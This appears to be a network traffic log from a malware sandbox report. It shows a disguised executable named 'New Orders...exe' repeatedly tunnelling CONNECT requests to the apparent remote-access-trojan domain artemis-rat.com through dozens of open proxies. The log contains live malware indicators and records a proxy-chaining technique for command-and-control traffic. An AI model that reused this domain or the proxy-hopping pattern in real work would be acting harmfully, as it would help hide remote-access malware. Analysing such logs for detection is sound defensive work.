                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1337192.168.2.953246191.240.153.16580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.155802965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148473978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.242254019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.242485046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.050396919 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1338192.168.2.95169552.35.240.11910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.156567097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.346992970 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1339192.168.2.951526162.241.50.179537557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.161569118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.164132118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.164241076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.164519072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.273159027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.273149967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.273129940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:57.273226976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1340192.168.2.95145541.223.234.116372597672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.310422897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1341192.168.2.951402202.55.134.22731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.394715071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.337148905 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1342192.168.2.95392589.168.121.17531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.395230055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.710134029 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1343192.168.2.951686189.240.60.16690907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.397761106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.668576002 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1344192.168.2.953874202.40.181.220312477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.411007881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1345192.168.2.95169852.151.210.20490007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.411012888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1346192.168.2.953969104.25.184.189807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.451978922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.606209993 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1347192.168.2.953973172.67.182.90807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.452347994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.606714010 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1348192.168.2.953983172.67.181.103807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.452642918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.607064009 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1349192.168.2.953986172.67.181.58807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.454449892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.609847069 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1350192.168.2.953997104.16.108.149807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.456430912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.611165047 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1351192.168.2.95146014.207.167.11480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.458323956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632528067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.633152962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633177042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.642390013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.741858006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1352192.168.2.953934125.25.40.3880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.459259033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.104557037 CET202INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 487
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:16 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:16 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1353192.168.2.95395478.30.128.1080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.465864897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1354192.168.2.954015104.20.179.187807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.466084957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.620312929 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1355192.168.2.954032104.18.81.76807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.467216969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.621660948 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1356192.168.2.954038104.25.115.125807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.467391014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.621737957 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1357192.168.2.951682103.113.71.23031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.470488071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477458954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
